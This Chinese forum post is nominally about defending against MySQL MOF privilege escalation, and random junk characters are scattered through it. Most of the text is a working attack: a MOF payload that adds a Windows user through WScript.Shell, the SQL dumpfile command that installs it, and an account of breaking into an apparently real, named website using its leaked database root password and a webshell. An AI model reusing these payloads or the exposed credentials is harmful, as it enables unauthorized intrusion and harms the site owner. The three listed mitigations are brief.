Mysql mof扩展漏洞防范方法9 I( _6 }2 _' k( {
$ f& w ]; f0 B2 |, Y+ d网上公开的一些利用代码:
, v( Q5 h) v3 E, s5 K
* r9 Z ^4 Q, R2 P0 d5 S#pragma namespace(“\\\\.\\root\\subscription”)
, `; v/ ?1 b! C4 i( ^! T
" P3 _. [) T5 uinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };9 U0 @$ ?" E q" ~9 x
) \4 s( R7 [. v, \, P/ J
$ L. l% }' h! `, V1 p2 q, A" r
& T* Z) g9 U4 R7 E7 G 0 {1 D8 z* @, j6 z1 J
: ^: f' g# A% g% b0 {连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;9 w. u+ ]0 |) w* i% L2 v
从上面代码来看得出解决办法:
. b6 k7 y4 |! v( R$ k7 Z3 p* d; G G" S
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
7 a: P' c3 m. I A3 ~+ k+ x2 g2 N x7 y& q! p! J5 l* q R
2、禁止使用”WScript.Shel”组件
6 T7 o! o, u' O6 ?( Q q# `: T* r/ M; P: u* D- l
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER! v7 w/ }5 S! Q
1 `% D2 x. S' z9 Z$ C
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下- \9 m& e$ O, c; ?
4 z l+ G2 M) W: H* @事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权$ b$ q) N/ [! \. ^9 e7 x& ^: p
. j2 D- J6 u7 V8 ]6 r但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容2 S8 C8 T+ N: E; N
* v2 w h9 V, }# a7 B6 x, b1 d( |看懂了后就开始练手吧( v& p8 j. i9 P% |( p% S
6 u5 Q R L6 i) x! n, ^http://www.webbmw.com/config/config_ucenter.php 一句话 a
4 C0 X, x/ q" f2 s/ E/ ]$ b9 N
4 l. `2 P4 L' c$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
6 ~1 m# a$ A4 l% o7 m2 W0 [( Y
1 O5 g# q" A% S于是直接用菜刀开搞
. j% d1 h0 I$ h: ?" \9 p2 Q3 X& l
4 G' W; n3 K0 K9 U* |- ^8 W5 U5 W7 F" c上马先0 [; x3 M5 d# ]( @
. l, g6 N+ p- _* U
既然有了那些账号 之类的 于是我们就执行吧…….
8 T S& t" c0 {4 v' R4 `: n2 M1 n4 b, g
小小的说下# `6 u: Y, w1 B) m) P L I* B
5 {* w% [- D- x a0 t在这里第1次执行未成功 原因未知; P: |* L9 f% b5 I
* x( @5 e0 t& N8 m9 U7 s( c4 t
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。8 z+ C3 g3 ?+ q/ C& B# f
# o6 U" D& {. s+ K#pragma namespace(“\\\\.\\root\\subscription”)) `- w2 U4 D5 I
% Z4 f5 O* q# H$ ?, Z# q% c3 J, V# xinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
; B$ g# m8 I. P8 p( ^
0 n5 g& v# ?' q0 o; y& P, |# h我是将文件放到C:\WINDOWS\temp\1.mof
* F7 o( U: c5 {; U' b+ M% `9 E- G. l
所以我们就改下执行的代码 Q2 l2 W, k; B2 h5 [8 V _
7 ~1 L' [: X4 K& U, [+ S4 Qselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
9 Q% U; `0 f9 m2 g1 @0 O K7 C* v) S$ ^0 d4 m7 l+ M
+ Z* N4 M/ v) r6 ^/ j- T8 G
5 {% D j/ B4 ?# J但是 你会发现账号还是没有躺在那里。。
* o% v& ^" c" C6 n! a' i+ Q8 f2 V- b6 a! b
于是我就感觉蛋疼
9 g& Q' r; a6 J4 V8 }) k# G: f6 N/ d* t3 Y/ T) a4 t
就去一个一个去执行 但是执行到第2个 mysql时就成功了………8 r$ g: T. I( x" l; U# \
5 C4 V6 C2 Z7 }" E4 v, R9 J" [8 S
/ n) J$ [3 ]9 F6 ^2 T2 D5 j- i9 V) R8 B* ~8 K6 j g5 i
但是其他库均不成功…/ ~ P7 G$ m" S: A% M
' b8 z, m; i7 }我就很费解呀 到底为什么不成功求大牛解答…
% f. D$ `6 J6 `3 k
, y2 q! w3 z4 ]9 }4 h. j+ A8 \4 `& z: ]/ [+ X, q: j E
- H0 s* x# J2 W9 u3 o
|